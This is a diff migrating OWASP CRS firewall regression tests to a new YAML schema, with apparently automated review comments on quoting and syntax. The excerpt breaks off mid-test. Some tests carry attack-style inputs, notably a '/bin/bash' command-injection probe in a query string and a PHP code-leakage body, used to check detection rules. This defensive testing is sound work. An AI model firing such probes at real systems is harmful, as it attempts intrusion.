@@ -1,72 +1,68 @@ --- meta: author: "studersi, azurit" - enabled: true - name: "959100.yaml" description: | Test whether the outbound blocking mechanism works by testing whether rule 959100 is triggered. For these tests, existing test are repurposed with different assertions. Instead of asserting that the original rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking rule to be triggered. +rule_id: 959100 tests: - - test_title: 959100-1 + - test_id: 1 desc: Test is basically identical to 953120-1 (PHP leakage positive test in phase 4) but here we assert that the outbound blocking mechanism is triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" - output: - log_contains: "id \"959100\"" - - test_title: 959100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" + output: + log_contains: "id \"959100\"" + - test_id: 2 desc: Test is basically identical to 953120-1 (PHP leakage negative test in phase 4) but here we assert that the outbound blocking mechanism is not triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test 
agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "<?php12345"} - output: - no_log_contains: "id \"959100\"" - - test_title: 959100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "<?php12345"} + output: + no_log_contains: "id \"959100\"" + - test_id: 3 desc: Test is basically identical to 959100-1 (see above) but here we assert that the scores are summed up and reported properly stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" - output: - log_contains: "Outbound Anomaly Score Exceeded [(]Total Score: " + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" 
?>\"}" + output: + log_contains: "Outbound Anomaly Score Exceeded [(]Total Score: " diff --git a/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml index df07008b4..2f454e790 100644 --- a/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml +++ b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml 
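Review bot: Test 2's description says it is identical to `953120-1 (PHP leakage negative test in phase 4)` while test 1 describes the same `953120-1` as the positive test; one of the two cross-references is probably off, so the negative case should cite whichever 953120 test it actually mirrors. Tests 1 and 3 also send a byte-identical request and differ only in the assertion; a one-line comment on test 3 such as `# same request as test 1; only the score assertion differs` would spare the next reader a line-by-line comparison. Both points concern context lines, but this hunk re-indents every line of these tests anyway.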
@@ -1,78 +1,74 @@ --- meta: author: "studersi, azurit" - enabled: true - name: "980170.yaml" description: | Test whether level 4 inbound reporting in phase 5 works by testing whether rule 980170 is triggered. For these tests, existing test are repurposed with different assertions. Instead of asserting that the original rules are triggered that the tests are written for, we assert that triggering these rules causes the corresponding reporting rules to be triggered. +rule_id: 980170 tests: - - test_title: 980170-1 + - test_id: 1 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that was blocked stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "127.0.0.1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - # Will match rules - # - 920273: restricted characters violation - # - 920350: numeric IP in Host header - # - 932160: Unix remote command execution - # - 932236: Unix command injection - # - 932260: Unix remote command execution - uri: "/get?a=/bin/bash" - version: "HTTP/1.1" - output: - # Phase 5 rules are prone to a race condition when parsing log output. - # Retry the test once if it fails to work around this issue. - # See https://github.com/coreruleset/go-ftw/issues/141. 
- retry_once: true - log_contains: "id \"980170\"" - - test_title: 980170-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + # Will match rules + # - 920273: restricted characters violation + # - 920350: numeric IP in Host header + # - 932160: Unix remote command execution + # - 932236: Unix command injection + # - 932260: Unix remote command execution + uri: "/get?a=/bin/bash" + version: "HTTP/1.1" + output: + # Phase 5 rules are prone to a race condition when parsing log output. + # Retry the test once if it fails to work around this issue. + # See https://github.com/coreruleset/go-ftw/issues/141. + retry_once: true + log_contains: "id \"980170\"" + - test_id: 2 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that scored but was not blocked stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - # Will match rule 920350: numeric IP in Host header - Host: "127.0.0.1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - # Phase 5 rules are prone to a race condition when parsing log output. - # Retry the test once if it fails to work around this issue. - # See https://github.com/coreruleset/go-ftw/issues/141. 
- retry_once: true - log_contains: "id \"980170\"" - - test_title: 980170-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + # Will match rule 920350: numeric IP in Host header + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + # Phase 5 rules are prone to a race condition when parsing log output. + # Retry the test once if it fails to work around this issue. + # See https://github.com/coreruleset/go-ftw/issues/141. + retry_once: true + log_contains: "id \"980170\"" + - test_id: 3 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is not logged that did not score stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - # Phase 5 rules are prone to a race condition when parsing log output. - # Retry the test once if it fails to work around this issue. - # See https://github.com/coreruleset/go-ftw/issues/141. - retry_once: true - no_log_contains: "id \"980170\"" + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + # Phase 5 rules are prone to a race condition when parsing log output. + # Retry the test once if it fails to work around this issue. + # See https://github.com/coreruleset/go-ftw/issues/141. + retry_once: true + no_log_contains: "id \"980170\"" 
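Review bot: The re-indented `Accept: text/xml,...` header lines in all three tests stay unquoted, unlike every other file in this commit, which writes the same value as a double-quoted string. A plain scalar containing `,`, `;` and `*/*` parses today, but quoting it removes any dependence on plain-scalar edge cases and keeps the files uniform: `Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"`. Test 1's `Host: "127.0.0.1"` lacks the `# Will match rule 920350: numeric IP in Host header` comment that test 2 carries; adding it would make the two tests read alike.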
diff --git a/tests/regression/tests/base_positive_rules.py b/tests/regression/tests/base_positive_rules.py index 2617ad7a7..9400d085c 100755 --- a/tests/regression/tests/base_positive_rules.py +++ b/tests/regression/tests/base_positive_rules.py @@ -17,9 +17,7 @@ skeletontest=0 Meta='''--- meta: - author: "spartantri" - enabled: true - name: "skeletonid.yaml" + author: "spartantri" name: "skeletonid.yaml" description: "Positive tests for rule skeletonid" tests: ''' diff --git a/tests/regression/tests/positivetest-light.yaml.skeleton b/tests/regression/tests/positivetest-light.yaml.skeleton index 65ca49569..07edf93e4 100644 --- a/tests/regression/tests/positivetest-light.yaml.skeleton +++ b/tests/regression/tests/positivetest-light.yaml.skeleton 
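Review bot: The single added line in the Meta template appears to carry both `author: "spartantri"` and `name: "skeletonid.yaml"`, which is what the hunk counts (three removed, one added) imply once the collapsed whitespace is taken into account; a line of the form `author: "spartantri" name: "skeletonid.yaml"` is not valid YAML, and even split over two lines it keeps the `name` key that the regression files in this same commit remove in favour of `rule_id`. If the intent is to match the new schema, the template should read `  author: "spartantri"` on its own line and gain `rule_id: skeletonid` at top level next to `tests:`, mirroring how `skeletonid` is already substituted into the description and `log_contains`. Please check the rendered output of this generator against one of the converted YAML files.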
@@ -1,255 +1,223 @@ - - test_title: skeletonid-skeletontest + test_id: 1 desc: "Argument test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=skeletonkeyword" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 2 desc: "Argument name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - method: "POST" - version: "HTTP/1.0" - data: "skeletonkeyword=test" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + 
Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword=test" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 3 desc: "Cookie test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - Cookie: test=skeletonkeyword - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: test=skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 4 desc: "Cookie name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" 
- Cookie: skeletonkeyword=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: skeletonkeyword=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 5 desc: "Request header test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - test: skeletonkeyword - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + test: skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 6 desc: "XML attribute value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: 
"skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 7 desc: "XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: 
"skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 8 desc: "Nested XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 9 desc: "Content-Type text/plain includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: 
"skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=skeletonkeyword" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 10 desc: "Content-Type application/json arg value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"skeletonkeyword\"}" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"skeletonkeyword\"}" + 
output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 11 desc: "Content-Type application/json arg name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"skeletonkeyword\": \"test\"}" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"skeletonkeyword\": \"test\"}" + output: + log_contains: "id \"skeletonid\"" diff --git a/tests/regression/tests/positivetest.yaml.skeleton b/tests/regression/tests/positivetest.yaml.skeleton index 83f0b2dee..181a36af4 100644 --- a/tests/regression/tests/positivetest.yaml.skeleton +++ b/tests/regression/tests/positivetest.yaml.skeleton 
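Review bot: The first test entry's new side reads `test_id: 1` with no leading `- ` sequence indicator, while entries 2 to 11 in this file and entry 1 of positivetest.yaml.skeleton in the next hunk are written `- test_id: N`. Collapsed whitespace makes this hard to read with certainty, but if the skeleton really omits the dash the rendered `tests:` sequence will not parse unless the generator prepends it; the safe form is `- test_id: 1` like the others. A one-line comment at the top of the skeleton stating whether the generator or the skeleton owns the first `- ` would settle the question for future edits.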
@@ -1,393 +1,342 @@ - - - test_title: skeletonid-skeletontest + - test_id: 1 desc: "Argument test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=skeletonkeyword" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 2 desc: "Argument name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - method: "POST" - version: "HTTP/1.0" - data: "skeletonkeyword=test" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + 
Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword=test" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 3 desc: "Cookie test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - Cookie: test=skeletonkeyword - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: test=skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 4 desc: "Cookie name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" 
- Cookie: skeletonkeyword=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: skeletonkeyword=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 5 desc: "Request header test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - test: skeletonkeyword - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + test: skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 6 desc: "XML element includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: 
